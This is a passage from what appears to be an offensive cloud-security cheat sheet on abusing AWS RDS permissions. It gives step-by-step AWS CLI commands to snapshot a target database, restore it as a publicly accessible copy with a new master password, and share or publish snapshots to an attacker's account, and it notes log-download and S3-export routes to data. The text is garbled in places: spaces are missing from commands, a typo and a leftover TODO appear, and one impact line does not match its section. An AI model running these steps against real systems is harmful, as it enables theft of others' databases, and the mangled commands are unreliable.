If the attacker has enough permissions, he could make a DB publicly accessible by creating a snapshot of the DB, and then a publicly accessible DB from the snapshot.
awsrdsdescribe-db-instances# Get DB identifierawsrdscreate-db-snapshot \--db-instance-identifier<db-id> \--db-snapshot-identifiercloudgoat# Get subnet groups & security groupsawsrdsdescribe-db-subnet-groupsawsec2describe-security-groupsawsrdsrestore-db-instance-from-db-snapshot \--db-instance-identifier"new-db-not-malicious" \--db-snapshot-identifier<scapshotId> \--db-subnet-group-name<dbsubnetgroup> \--publicly-accessible \--vpc-security-group-ids<ec2-securitygroup>awsrdsmodify-db-instance \--db-instance-identifier"new-db-not-malicious" \--master-user-password'Llaody2f6.123' \--apply-immediately# Connect to the new DB after a few mins
An attacker with these permissions could create an snapshot of a DB and make it publiclyavailable. Then, he could just create in his own account a DB from that snapshot.
If the attacker doesn't have the rds:CreateDBSnapshot, he still could make other created snapshots public.
# create snapshotawsrdscreate-db-snapshot--db-instance-identifier<db-instance-identifier>--db-snapshot-identifier<snapshot-name># Make it public/share with attackers accountaws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all
## Specify account IDs instead of "all" to give access only to a specific account: --values-to-add {"111122223333","444455556666"}
rds:DownloadDBLogFilePortion
An attacker with the rds:DownloadDBLogFilePortion permission can download portions of an RDS instance's log files. If sensitive data or access credentials are accidentally logged, the attacker could potentially use this information to escalate their privileges or perform unauthorized actions.
Potential impact: Deletion of existing RDS instances, and potential loss of data.
rds:StartExportTask
TODO: Test
An attacker with this permission can export an RDS instance snapshot to an S3 bucket. If the attacker has control over the destination S3 bucket, they can potentially access sensitive data within the exported snapshot.